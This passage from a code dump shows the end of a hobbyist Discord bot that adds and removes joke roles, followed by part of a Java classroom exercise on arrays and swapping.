\"PlayStation\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"roblox\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"ROBLOX\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"ROBLOX\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"skid\":\n\t\t\t\t\t\tmessage.reply(\":x: Use ``.finish`` to add that role. :exclamation: **This will remove you from this channel and send you to the main chat.\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"staff\":\n\t\t\t\t\t\tmessage.reply(\":x: We can\\'t just give you the staff role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"super skid\":\n\t\t\t\t\t\tmessage.reply(\":x: Only I can have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"techie\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Techie\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"Techie\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"weeb\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Weeb\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"Weeb\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"weeaboo\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Weeb\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"Weeb\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"wow\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"WoW\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"WoW\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"world of warcraft\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"WoW\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"WoW\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"xbox\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Xbox\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"Xbox\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tdefault:\n\t\t\t\t\t\tmessage.reply(\":question: I can't find that role. Did you spell it right?\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t};\n\t\t\t\tbreak;\n\t\t\tcase \"removerole\":\n\t\t\t\tswitch (role) {\n\t\t\t\t\tcase \"android\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Android\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"Android\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"bacon\":\n\t\t\t\t\t\tmessage.reply(\":smirk: Either you looked at the source code or you really wanted to know if there was a bacon role. God dammit.\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"bot\":\n\t\t\t\t\t\tmessage.reply(\":x: You aren't a bot silly!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"furry\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Furry\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"Furry\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"gamer\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Gamer\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"Gamer\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"ios\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"iOS\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"iOS\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"little boys\":\n\t\t\t\t\t\tmessage.reply(\":x: No one is eligible for this role.\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"lol\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"LoL\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"LoL\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"league of legends\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"LoL\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"LoL\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"meme lord\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Meme Lord\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"Meme Lord\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"muted\":\n\t\t\t\t\t\tmessage.reply(\":x: You don't have that role, nor do you want it.\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"nintendo switch\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Nintendo Switch\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"Nintendo Switch\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"overwatch\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Overwatch\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"Overwatch\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"pc\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"PC Master Race\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"PC Master Race\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"pc master race\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"PC Master Race\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"PC Master Race\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"playstation\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"PlayStation\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"PlayStation\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"roblox\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"ROBLOX\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"ROBLOX\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"skid\":\n\t\t\t\t\t\tmessage.reply(\":x: Use ``.finish`` to add that role. :exclamation: **This will remove you from this channel and send you to the main chat.\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"staff\":\n\t\t\t\t\t\tmessage.reply(\":x: We can\\'t just give you the staff role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"super skid\":\n\t\t\t\t\t\tmessage.reply(\":x: Only I can have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"techie\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Techie\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"Techie\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"weeb\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Weeb\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"Weeb\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"weeaboo\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Weeb\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"Weeb\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"wow\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"WoW\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"WoW\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"world of warcraft\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"WoW\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"WoW\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"xbox\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Xbox\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"Xbox\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tdefault:\n\t\t\t\t\t\tmessage.reply(\":question: I can't find that role. Did you spell it right?\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t};\n\t\t\t\tbreak;\n\t\t\tcase \"finish\":\n\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"Skid\"));\n\t\t\t\tmessage.delete();\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\treturn;\n\t\t};\n\t\treturn;\n\t};\n\tswitch (args[0].toLowerCase()) {\n\t\tcase \"help\":\n\t\t\tvar helpEmbed = new Discord.RichEmbed().setThumbnail(client.user.avatarURL).setAuthor('Commands', client.user.avatarURL).setTitle('Command List').setDescription('Commands everyone can use.').setColor(0x1bb80f).addField(prefix + 'help - Sends this command.');\n\t\t\tmessage.author.send(helpEmbed)\n\t\t\tbreak;\n\t};\n\tif (message.author.id === zen) {\n\t\tswitch (args[0].toLowerCase()) {\n\t\t\tcase \"famify\":\n\t\t\t\tvar fam = message.mentions.members.first();\n\t\t\t\tif (fam.roles.exists(\"name\", \"Little Boys\")) {\n\t\t\t\t\tmessage.reply(\"That skid is already part of the :triumph::ok_hand::family::sunglasses: **FAM SQUAD** :sunglasses::family::ok_hand::triumph:\");\n\t\t\t\t\treturn;\n\t\t\t\t};\n\t\t\t\tmessage.channel.send(\":triumph: :triumph: THROUGH THE POWER OF GRINDING :triumph: :triumph:\").then(setTimeout(function() {\n\t\t\t\t\tmessage.channel.send(\":ok_hand: :ok_hand: \" + args[1] + \" I HEAR BY DEEM YOU... :ok_hand: :ok_hand:\").then(setTimeout(function() {\n\t\t\t\t\t\tmessage.channel.send(\":family: :family: :sunglasses: :sunglasses: PART OF THE FAM :sunglasses: :sunglasses: :family: :family:\");\n\t\t\t\t\t}, 2000));\n\t\t\t\t}, 2000));\n\t\t\t\tfam.addRole(message.member.guild.roles.find(\"name\", \"Little Boys\"));\n\t\t\t\tbreak;\n\t\t};\n\t};\n});\nclient.login(token);\n"
},
{
"alpha_fraction": 0.5553547143936157,
"alphanum_fraction": 0.5643922090530396,
"avg_line_length": 43.71717071533203,
"blob_id": "4bef0dc62e8ecbacefe7aedacd90916281fae483",
"content_id": "1e7c8c1725eee268c41e3dca2207bf284bdbea76",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 4426,
"license_type": "permissive",
"max_line_length": 164,
"num_lines": 99,
"path": "/Java/APCSA/ArrayExp.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "/**\n * In this exploratory you will instantiate a 1-D static array, use both loop structures, work with error messages, \n * see the difference between deep and shallow memory values, and swap array elements.\n * \n * @author Mr. Redacted\n * @version 12.15.16\n */\npublic class ArrayExp\n{\n public static void main(String[] args)\n {\n //Create a String array called names and populate it with 11 names. You can do this either with an initializer list \n //or one index at a time.\n String[] names = {\"R\",\"e\",\"d\",\"a\",\"c\",\"t\",\"e\",\"d\",\"!\",\"!!\",\"!!!\"};\n int x = 5;\n int y = 10;\n System.out.println(\"pre-swap x is: \" + x);\n System.out.println(\"pre-swap y is: \" + y);\n swap(x, y);\n System.out.println(\"post-swap x is: \" + x);\n System.out.println(\"post-swap y is: \" + y);\n //Use the 'old' for loop to print every name. Use the 'length' field, not 11. \n for (int i=0;i<names.length;i++) \n System.out.println(names[i]);\n printarray(names);\n //Use the enhanced for..each loop to print every name.\n for (String bruh: names)\n System.out.println(bruh);\n //Use the enhanced for..each loop to change the elements of names and print. Did it work? Why/not?\n for (String hee: names) {\n hee = hee + \" B.\";\n }\n printarray(names); \n //Print 4 random names from the array. Use either a Random object or the random method.\n for (int i=0;i<4;i++) {\n int r = (int) (Math.random() * 11);\n System.out.println(names[r]);\n }\n //Little Johnny is trying to print the last name in your list.\n //Uncomment the next line and look at the error message. What is happening? Fix it so it prints the last name.\n System.out.println(names[names.length - 1]);\n \n //Pass your array to the print statement below. What happened? why?\n //System.out.println(PUT YOUR ARRAY NAME HERE);\n //Fix the issue so that you can print the names in the list - perhaps write a new method (outside the main) and call it.\n \n // You did this for us.\n\n //Correctly swap the first two names in the list and print the list again to check. Write a method for swapping.\n\n arraySwap(names, 0, 10);\n printarray(names);\n \n //Swap every other element using a loop. Elements 0 and 1 should swap, then 2 and 3 , and so on. \n //Being that your list has an odd number of elements, it should not swap the last element.\n //the method should work for any size array > 1. (Use a variable for the ending index)\n \n for (int i=0;i<names.length-1;i+=2) {\n arraySwap(names, i,i+1);\n }\n printarray(names);\n //Write a method called toBetty() that accepts a String array and changes all the names to 'Betty'.\n //names = toBetty(names);\n //printarray(names);\n //OOOOOps!! We have more names to add to the array. Write code with loops (plural) that will put the elements of the two arrays into a third, longer array.\n //These new elements should be at the end of the array.\n // String [] oops = {\"Alpha\", \"Beta\", \"Gamma\", \"Delta\", \"Epsilon\"};\n //Write code that creates an array named 'odds' and stores all odd numbers between -6 and 38 using a for loop. \n //Make the array's size exactly large enough to store the numbers.\n \n // printarray(odds);\n /////////////////////////////// END OF FIRST PART OF THE EXPLORATORY //////////////////////////////////\n \n } //END OF MAIN\n //////////////////// PUT METHODS BELOW HERE //////////////////////\n public static void printarray(String[] arr){\n System.out.print(\"[\");\n for(int k = 0; k < arr.length-1; k++)\n System.out.print(arr[k] + \", \"); //no braces needed b/c it's only one line.\n System.out.println( arr[arr.length-1] + \"]\");\n }\n public static void swap(int a, int b) {\n int temp = a;\n a = b;\n b = temp;\n }\n public static void arraySwap(String[] in, int a, int b) {\n String tmp = in[a];\n in[a] = in[b];\n in[b] = tmp;\n }\n public static String[] toBetty(String[] in) {\n 